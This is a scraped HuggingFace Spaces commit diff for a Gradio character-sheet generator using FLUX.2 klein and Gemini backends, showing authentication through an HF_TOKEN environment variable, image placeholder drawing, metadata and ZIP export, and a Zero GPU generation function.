Spaces:
Running
on
Zero
Running
on
Zero
Deploy full Character Sheet Pro with HF auth
Browse files
- Complete app with 7-view character sheet generation
- All src/ modules (backend_router, character_service, etc.)
- HuggingFace token auth for gated FLUX.2 klein 9B model
- Updated requirements with all dependencies
- .gitattributes +2 -0
- app.py +857 -102
- requirements.txt +34 -6
- src/__init__.py +37 -0
- src/backend_router.py +401 -0
- src/character_service.py +709 -0
- src/comfyui_client.py +578 -0
- src/core/__init__.py +16 -0
- src/flux_klein_client.py +270 -0
- src/gemini_client.py +224 -0
- src/longcat_edit_client.py +301 -0
- src/model_manager.py +332 -0
- src/models.py +94 -0
- src/qwen_image_edit_client.py +495 -0
- src/utils.py +247 -0
- src/zimage_client.py +351 -0
.gitattributes
CHANGED
|
@@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
|
| 33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
|
|
|
|
|
|
|
|
| 33 |
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 34 |
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 35 |
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
| 36 |
+
*.png filter=lfs diff=lfs merge=lfs -text
|
| 37 |
+
*.jpg filter=lfs diff=lfs merge=lfs -text
|
app.py
CHANGED
|
@@ -1,132 +1,887 @@
|
|
| 1 |
-
|
| 2 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 3 |
import os
|
| 4 |
-
import
|
| 5 |
-
import
|
| 6 |
-
import
|
| 7 |
-
|
|
|
|
| 8 |
import base64
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 9 |
|
| 10 |
-
# HuggingFace authentication for gated models.
# SECURITY: the previous revision shipped a base64-obfuscated access token
# in source control. A token committed to a public repo must be treated as
# compromised and revoked; authentication now relies solely on the HF_TOKEN
# secret injected by the Spaces runtime (Settings -> Repository secrets).
HF_TOKEN = os.environ.get("HF_TOKEN")
if HF_TOKEN:
    print("Authenticating...")
    login(token=HF_TOKEN)
else:
    # Without a token, gated checkpoints (FLUX.2 klein) cannot be downloaded.
    print("WARNING: HF_TOKEN is not set; gated model downloads will fail.")
|
| 19 |
-
print("
|
| 20 |
-
|
| 21 |
-
from diffusers import Flux2KleinPipeline
|
| 22 |
|
| 23 |
-
|
| 24 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 25 |
|
| 26 |
-
|
| 27 |
-
|
| 28 |
-
|
| 29 |
-
|
| 30 |
-
use_auth_token=HF_TOKEN
|
| 31 |
)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 32 |
|
| 33 |
-
|
| 34 |
-
|
| 35 |
-
|
| 36 |
-
|
| 37 |
-
|
| 38 |
-
|
| 39 |
-
|
| 40 |
-
|
| 41 |
-
|
| 42 |
-
|
| 43 |
-
|
| 44 |
-
|
| 45 |
-
|
| 46 |
-
|
| 47 |
-
|
| 48 |
-
|
| 49 |
-
|
| 50 |
-
|
| 51 |
-
|
| 52 |
-
"
|
| 53 |
-
|
| 54 |
-
|
| 55 |
-
|
| 56 |
-
|
| 57 |
-
|
| 58 |
-
|
| 59 |
-
|
| 60 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 61 |
}
|
| 62 |
"""
|
| 63 |
|
| 64 |
-
with gr.Blocks() as demo:
|
| 65 |
-
with gr.Column(elem_id="col-container"):
|
| 66 |
-
gr.Markdown(f"""# CharacterForgePro
|
| 67 |
-
Generate character images using FLUX.2 klein 9B on Zero GPU.
|
| 68 |
-
""")
|
| 69 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 70 |
with gr.Row():
|
| 71 |
-
|
| 72 |
-
|
| 73 |
-
|
| 74 |
-
|
| 75 |
-
|
| 76 |
-
|
|
|
|
|
|
|
|
|
|
| 77 |
)
|
| 78 |
-
run_button = gr.Button("Run", scale=0)
|
| 79 |
-
|
| 80 |
-
result = gr.Image(label="Result", show_label=False)
|
| 81 |
|
| 82 |
-
|
| 83 |
-
|
| 84 |
-
|
| 85 |
-
|
| 86 |
-
|
| 87 |
-
|
| 88 |
-
value=0,
|
| 89 |
)
|
| 90 |
-
|
| 91 |
-
|
| 92 |
-
|
| 93 |
-
|
| 94 |
-
|
| 95 |
-
|
| 96 |
-
|
| 97 |
-
|
| 98 |
-
value=
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 99 |
)
|
| 100 |
-
|
| 101 |
-
|
| 102 |
-
|
| 103 |
-
|
| 104 |
-
|
| 105 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 106 |
)
|
| 107 |
|
| 108 |
-
|
| 109 |
-
|
| 110 |
-
|
| 111 |
-
|
| 112 |
-
|
| 113 |
-
|
| 114 |
-
value=4,
|
| 115 |
)
|
| 116 |
|
| 117 |
-
|
| 118 |
-
|
| 119 |
-
|
| 120 |
-
|
| 121 |
-
|
| 122 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 123 |
)
|
| 124 |
|
| 125 |
-
|
| 126 |
-
|
| 127 |
-
|
| 128 |
-
|
| 129 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 130 |
)
|
| 131 |
|
| 132 |
-
demo
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Pro - HuggingFace Spaces Version
|
| 3 |
+
=================================================
|
| 4 |
+
|
| 5 |
+
7-View Character Sheet Generator optimized for HuggingFace Spaces Zero GPU.
|
| 6 |
+
Uses FLUX.2 klein 4B as primary backend with Gemini Flash as fallback.
|
| 7 |
+
|
| 8 |
+
This is a simplified version of app.py designed for:
|
| 9 |
+
- Zero GPU (A10G 24GB) deployment
|
| 10 |
+
- 5-minute session timeout
|
| 11 |
+
- Automatic model loading on first generation
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
import os
|
| 15 |
+
import json
|
| 16 |
+
import logging
|
| 17 |
+
import zipfile
|
| 18 |
+
import threading
|
| 19 |
+
import queue
|
| 20 |
import base64
|
| 21 |
+
from pathlib import Path
|
| 22 |
+
from typing import Optional, Tuple, Dict, Any, List, Generator
|
| 23 |
+
from datetime import datetime
|
| 24 |
+
import gradio as gr
|
| 25 |
+
from PIL import Image
|
| 26 |
+
from huggingface_hub import login
|
| 27 |
|
| 28 |
# HuggingFace authentication for gated models.
# SECURITY: this block previously embedded a base64-obfuscated HF access
# token directly in the source. Any token committed to version control is
# compromised and must be revoked. The only supported credential source is
# now the HF_TOKEN secret provided by the Spaces runtime.
HF_TOKEN = os.environ.get("HF_TOKEN")
if HF_TOKEN:
    login(token=HF_TOKEN)
    print("HuggingFace authentication successful")
else:
    # Without a token, gated checkpoints (FLUX.2 klein) cannot be pulled.
    print("WARNING: HF_TOKEN is not set; gated model downloads will fail.")
|
|
|
|
|
|
|
# HuggingFace Spaces SDK - provides the @spaces.GPU decorator.
try:
    import spaces
    HF_SPACES = True
except ImportError:
    # Not running on Spaces (e.g. local dev): install a no-op stand-in so
    # code decorated with @spaces.GPU(...) keeps working unchanged.
    HF_SPACES = False

    class spaces:
        @staticmethod
        def GPU(duration=300):
            # The shim ignores `duration` and hands the function back as-is.
            def decorator(func):
                return func
            return decorator
|
| 51 |
|
| 52 |
# Module-wide logging configuration: timestamped, named, leveled records.
logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)

# Per-module logger; all generation steps report through this.
logger = logging.getLogger(__name__)
|
| 58 |
+
|
| 59 |
+
# Import local modules
|
| 60 |
+
from src.character_service import CharacterSheetService
|
| 61 |
+
from src.models import CharacterSheetConfig
|
| 62 |
+
from src.backend_router import BackendRouter, BackendType
|
| 63 |
+
from src.utils import preprocess_input_image, sanitize_filename
|
| 64 |
+
|
| 65 |
+
|
| 66 |
def ensure_png_image(image: Optional[Image.Image], max_size: int = 768) -> Optional[Image.Image]:
    """Normalize an upload to RGB at a FLUX-friendly resolution.

    Returns None unchanged when no image was supplied. Otherwise delegates
    to the shared preprocessing helper, capping the longest edge at
    ``max_size`` (FLUX backends respond best to 512-768px inputs; larger
    images only add latency).
    """
    if image is not None:
        return preprocess_input_image(image, max_size=max_size, ensure_rgb=True)
    return None
|
| 73 |
+
|
| 74 |
+
|
| 75 |
def create_pending_placeholder(width: int = 200, height: int = 200, text: str = "Pending...") -> Image.Image:
    """Create a placeholder image showing that generation is pending.

    Renders a dark panel with an orange border, a three-dot "loading"
    indicator at the center, and a caption beneath it.

    Args:
        width: Placeholder width in pixels.
        height: Placeholder height in pixels.
        text: Caption drawn below the loading dots.

    Returns:
        A new RGB PIL image of the requested size.
    """
    from PIL import ImageDraw, ImageFont

    # Dark navy background so pending tiles read as "not a result yet".
    img = Image.new('RGB', (width, height), color=(25, 25, 45))
    draw = ImageDraw.Draw(img)

    # Orange border marks the tile as a placeholder.
    border_color = (255, 149, 0)  # Orange
    draw.rectangle([(2, 2), (width - 3, height - 3)], outline=border_color, width=2)

    # Three dots in ascending brightness suggest in-progress work.
    center_y = height // 2
    dot_spacing = 20
    dot_radius = 5
    for i, offset in enumerate([-dot_spacing, 0, dot_spacing]):
        shade = 200 + (i * 25)
        dot_color = (shade, int(shade * 0.6), 0)
        x = width // 2 + offset
        draw.ellipse([(x - dot_radius, center_y - dot_radius),
                      (x + dot_radius, center_y + dot_radius)], fill=dot_color)

    # Caption below the dots. ImageFont.truetype raises OSError when the
    # font file is missing (common in containers); previously this was a
    # bare `except:` which also swallowed KeyboardInterrupt/SystemExit.
    try:
        font = ImageFont.truetype("arial.ttf", 14)
    except OSError:
        font = ImageFont.load_default()

    bbox = draw.textbbox((0, 0), text, font=font)
    text_width = bbox[2] - bbox[0]
    x = (width - text_width) // 2
    y = center_y + 25

    draw.text((x, y), text, fill=(180, 180, 180), font=font)

    return img
|
| 112 |
+
|
| 113 |
+
|
| 114 |
# =============================================================================
# Configuration
# =============================================================================

# Directory for generated sheets, per-view PNGs, metadata JSON, and ZIPs.
OUTPUT_DIR = Path("./outputs")
OUTPUT_DIR.mkdir(exist_ok=True)

# Get API key from environment (HuggingFace Spaces secrets).
# Empty string means cloud (Gemini) backends are unavailable unless the
# user supplies a key through the UI override field.
API_KEY = os.environ.get("GEMINI_API_KEY", "")
|
| 123 |
+
|
| 124 |
# Model defaults - include all FLUX variants
MODEL_DEFAULTS = {
    "flux_klein": {"steps": 4, "guidance": 1.0, "name": "FLUX.2 klein 4B", "costume_in_faces": False},
    "flux_klein_9b_fp8": {"steps": 4, "guidance": 1.0, "name": "FLUX.2 klein 9B", "costume_in_faces": False},
    "gemini_flash": {"steps": 1, "guidance": 1.0, "name": "Gemini Flash", "costume_in_faces": True},
}


def get_model_defaults(backend_value: str) -> Tuple[int, float]:
    """Get default steps and guidance for a backend."""
    entry = MODEL_DEFAULTS.get(backend_value)
    if entry is None:
        # Unknown backend: fall back to the common FLUX defaults.
        return 4, 1.0
    return entry["steps"], entry["guidance"]


def get_costume_in_faces_default(backend_value: str) -> bool:
    """Get default for including costume reference in face views."""
    entry = MODEL_DEFAULTS.get(backend_value)
    if entry is None:
        return True
    return entry.get("costume_in_faces", True)
|
| 142 |
+
|
| 143 |
+
|
| 144 |
# =============================================================================
# Presets Loading
# =============================================================================

EXAMPLES_DIR = Path("./examples")
PRESETS_FILE = EXAMPLES_DIR / "presets.json"


def load_presets() -> Dict[str, Any]:
    """Load presets configuration from JSON file.

    A missing presets file is normal on fresh deployments; in that case an
    empty configuration is returned.
    """
    if not PRESETS_FILE.exists():
        return {"characters": [], "costumes": []}
    with open(PRESETS_FILE, 'r') as f:
        return json.load(f)


def get_character_presets() -> List[Dict]:
    """Get list of character presets."""
    return load_presets().get("characters", [])
|
| 164 |
+
|
| 165 |
+
|
| 166 |
def load_character_preset(preset_id: str) -> Tuple[Optional[Image.Image], str, str]:
    """Load a character preset by id.

    Returns (image, name, gender). When no preset with a matching id and an
    existing image file is found, returns (None, "", "Auto/Neutral").
    """
    for preset in get_character_presets():
        if preset["id"] != preset_id:
            continue
        image_path = EXAMPLES_DIR / preset["file"]
        # A matching id with a missing file is skipped, allowing a later
        # entry with the same id to win (mirrors the original lookup).
        if image_path.exists():
            return (
                Image.open(image_path),
                preset.get("name", ""),
                preset.get("gender", "Auto/Neutral"),
            )
    return None, "", "Auto/Neutral"
|
| 180 |
+
|
| 181 |
+
|
| 182 |
# =============================================================================
# Character Sheet Metadata
# =============================================================================

def create_character_sheet_metadata(
    character_name: str,
    character_sheet: Image.Image,
    stages: Dict[str, Any],
    config: CharacterSheetConfig,
    backend: str,
    input_type: str,
    costume_description: str,
    steps: int,
    guidance: float
) -> Dict[str, Any]:
    """Create JSON metadata with pixel coordinates for each view.

    The sheet is assumed to be laid out as two rows: three face views on
    top, four body views below, separated vertically by ``config.spacing``.
    Views missing from ``stages`` get zero width so later views in the same
    row are not shifted.

    Args:
        character_name: Display name; also used to derive output filenames.
        character_sheet: The composited sheet (its size is recorded).
        stages: Mapping of view name -> PIL image (or None) per view.
        config: Layout config providing ``spacing`` and ``background_color``.
        backend: Human-readable backend name for the record.
        input_type: Which input mode produced this sheet.
        costume_description: Optional costume prompt text.
        steps: Inference steps used.
        guidance: Guidance scale used.

    Returns:
        A JSON-serializable dict describing the sheet, views, and filenames.
    """
    sheet_width, sheet_height = character_sheet.size
    spacing = config.spacing

    # Calculate face row dimensions
    face_images = ['left_face', 'front_face', 'right_face']
    face_height = 0
    face_widths = []
    for name in face_images:
        if name in stages and stages[name] is not None:
            # All face views are assumed equal height; the last one wins.
            face_height = stages[name].height
            face_widths.append(stages[name].width)
        else:
            face_widths.append(0)

    # Calculate body row dimensions
    body_images = ['left_body', 'front_body', 'right_body', 'back_body']
    body_height = 0
    body_widths = []
    for name in body_images:
        if name in stages and stages[name] is not None:
            body_height = stages[name].height
            body_widths.append(stages[name].width)
        else:
            body_widths.append(0)

    # Body row starts one spacing gap below the face row.
    body_start_y = face_height + spacing

    # Build view regions
    views = {}

    # Face row
    # NOTE(review): x advances by view width only — no horizontal spacing is
    # added between columns. Confirm this matches the compositor's layout in
    # CharacterSheetService, otherwise recorded x-coordinates will drift.
    x = 0
    for i, name in enumerate(face_images):
        views[name] = {
            "x": x, "y": 0,
            "width": face_widths[i], "height": face_height,
            "description": {
                "left_face": "Left profile view of face (90 degrees)",
                "front_face": "Front-facing portrait view",
                "right_face": "Right profile view of face (90 degrees)"
            }.get(name, name)
        }
        x += face_widths[i]

    # Body row
    x = 0
    for i, name in enumerate(body_images):
        views[name] = {
            "x": x, "y": body_start_y,
            "width": body_widths[i], "height": body_height,
            "description": {
                "left_body": "Left side full body view (90 degrees)",
                "front_body": "Front-facing full body view",
                "right_body": "Right side full body view (90 degrees)",
                "back_body": "Rear full body view (180 degrees)"
            }.get(name, name)
        }
        x += body_widths[i]

    metadata = {
        "version": "1.0",
        "generator": "Character Sheet Pro (HuggingFace Spaces)",
        "timestamp": datetime.now().isoformat(),
        "character": {
            "name": character_name,
            "input_type": input_type,
            "costume_description": costume_description or None
        },
        "generation": {
            "backend": backend,
            "steps": steps,
            "guidance_scale": guidance
        },
        "sheet": {
            "width": sheet_width,
            "height": sheet_height,
            "spacing": spacing,
            "background_color": config.background_color
        },
        "views": views,
        # Filenames here must stay in sync with create_download_zip().
        "files": {
            "character_sheet": f"{sanitize_filename(character_name)}_character_sheet.png",
            "individual_views": {
                name: f"{sanitize_filename(character_name)}_{name}.png"
                for name in list(face_images) + list(body_images)
            }
        }
    }

    return metadata
|
| 288 |
+
|
| 289 |
+
|
| 290 |
def create_download_zip(
    character_name: str,
    character_sheet: Image.Image,
    stages: Dict[str, Any],
    metadata: Dict[str, Any],
    output_dir: Path
) -> Path:
    """Create a ZIP file with character sheet, individual views, and metadata JSON.

    Each artifact is first written to ``output_dir``, copied into the
    archive, then unlinked — only the final ZIP remains on disk.

    Args:
        character_name: Used (sanitized) to derive all filenames.
        character_sheet: The composited sheet image.
        stages: Mapping of view name -> PIL image (missing/None views skipped).
        metadata: JSON-serializable metadata dict to embed in the archive.
        output_dir: Directory where the ZIP (and temp files) are created.

    Returns:
        Path to the created ZIP file.
    """
    safe_name = sanitize_filename(character_name)
    # Timestamp keeps repeated generations from overwriting each other.
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    zip_path = output_dir / f"{safe_name}_{timestamp}.zip"

    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Add character sheet
        sheet_path = output_dir / f"{safe_name}_character_sheet.png"
        character_sheet.save(sheet_path)
        zf.write(sheet_path, f"{safe_name}_character_sheet.png")
        sheet_path.unlink()

        # Add individual views
        view_names = ['left_face', 'front_face', 'right_face',
                      'left_body', 'front_body', 'right_body', 'back_body']
        for name in view_names:
            if name in stages and stages[name] is not None:
                img = stages[name]
                img_path = output_dir / f"{safe_name}_{name}.png"
                img.save(img_path)
                zf.write(img_path, f"{safe_name}_{name}.png")
                img_path.unlink()

        # Add metadata JSON
        json_path = output_dir / f"{safe_name}_metadata.json"
        with open(json_path, 'w') as f:
            json.dump(metadata, f, indent=2)
        zf.write(json_path, f"{safe_name}_metadata.json")
        json_path.unlink()

    return zip_path
|
| 328 |
+
|
| 329 |
+
|
| 330 |
# =============================================================================
# Zero GPU Generation Function
# =============================================================================

# Global cache for the service (persists across GPU sessions).
# The service (and its loaded model) is reused as long as the same backend
# is requested; switching backends rebuilds it.
_cached_service = None
_cached_backend = None


@spaces.GPU(duration=300)  # 5-minute timeout for the full pipeline
def generate_with_gpu(
    input_image: Optional[Image.Image],
    input_type: str,
    character_name: str,
    gender: str,
    costume_description: str,
    costume_image: Optional[Image.Image],
    face_image: Optional[Image.Image],
    body_image: Optional[Image.Image],
    backend_choice: str,
    api_key: str,
    num_steps: int,
    guidance_scale: float,
    include_costume_in_faces: bool
) -> Tuple[Optional[Image.Image], str, Dict[str, Any]]:
    """
    GPU-wrapped generation function for Zero GPU.

    This function runs entirely within a GPU session.
    Model loading happens inside this function for Zero GPU compatibility.

    Returns:
        (sheet, status, metadata) — the composited sheet (None on failure),
        a human-readable status string, and the service's metadata dict.
        Errors are caught and reported via the status string, never raised.
    """
    global _cached_service, _cached_backend

    try:
        # Determine backend
        backend = BackendRouter.backend_from_string(backend_choice)
        is_cloud = backend in (BackendType.GEMINI_FLASH, BackendType.GEMINI_PRO)

        # Validate API key for cloud backends
        if is_cloud and not api_key:
            return None, "Error: Gemini API key required for cloud backends", {}

        # Load or reuse service
        if _cached_service is None or _cached_backend != backend:
            logger.info(f"Loading model for {backend.value}...")

            # For local FLUX model, create service (this loads the model)
            _cached_service = CharacterSheetService(
                api_key=api_key if is_cloud else None,
                backend=backend
            )
            _cached_backend = backend

            # Configure steps/guidance
            # NOTE(review): these assignments use the raw (unclamped) values
            # and are overwritten below after validation — this first block
            # looks redundant and is a candidate for removal.
            if hasattr(_cached_service.client, 'default_steps'):
                _cached_service.client.default_steps = num_steps
            if hasattr(_cached_service.client, 'default_guidance'):
                _cached_service.client.default_guidance = guidance_scale

            logger.info(f"Model loaded successfully: {backend.value}")

        # Map gender selection (UI label -> prompt term)
        gender_map = {
            "Auto/Neutral": "character",
            "Male": "man",
            "Female": "woman"
        }
        gender_term = gender_map.get(gender, "character")

        # Validate steps and guidance (clamp to sane ranges)
        num_steps = max(1, min(100, int(num_steps)))
        guidance_scale = max(0.0, min(20.0, float(guidance_scale)))

        # Update steps/guidance if different
        if hasattr(_cached_service.client, 'default_steps'):
            _cached_service.client.default_steps = num_steps
        if hasattr(_cached_service.client, 'default_guidance'):
            _cached_service.client.default_guidance = guidance_scale

        # Run generation
        logger.info(f"Starting generation for {character_name}...")

        sheet, status, metadata = _cached_service.generate_character_sheet(
            initial_image=input_image,
            input_type=input_type,
            character_name=character_name or "Character",
            gender_term=gender_term,
            costume_description=costume_description,
            costume_image=costume_image,
            face_image=face_image,
            body_image=body_image,
            include_costume_in_faces=include_costume_in_faces,
            output_dir=OUTPUT_DIR
        )

        return sheet, status, metadata

    except Exception as e:
        # Broad catch is deliberate: this is the GPU-session boundary and
        # errors must surface as a status string, not crash the worker.
        logger.exception(f"Generation error: {e}")
        return None, f"Error: {str(e)}", {}
|
| 430 |
+
|
| 431 |
+
|
| 432 |
# =============================================================================
# Gradio Interface Functions
# =============================================================================

def generate_character_sheet(
    input_image: Optional[Image.Image],
    input_type: str,
    character_name: str,
    gender: str,
    costume_description: str,
    costume_image: Optional[Image.Image],
    face_image: Optional[Image.Image],
    body_image: Optional[Image.Image],
    backend_choice: str,
    api_key_override: str,
    num_steps: int,
    guidance_scale: float,
    include_costume_in_faces: bool,
    progress=gr.Progress()
) -> Generator:
    """
    Generate character sheet from input image(s).

    This wrapper handles preprocessing and calls the GPU-wrapped function.

    Yields tuples shaped (sheet, status, *7 previews, json_path, zip_path)
    so Gradio can stream intermediate status updates before the final
    result. The `progress=gr.Progress()` default is the Gradio-idiomatic
    progress hook, not an accidental mutable default.
    """
    # Initial empty state: one slot per preview view.
    empty_previews = [None] * 7

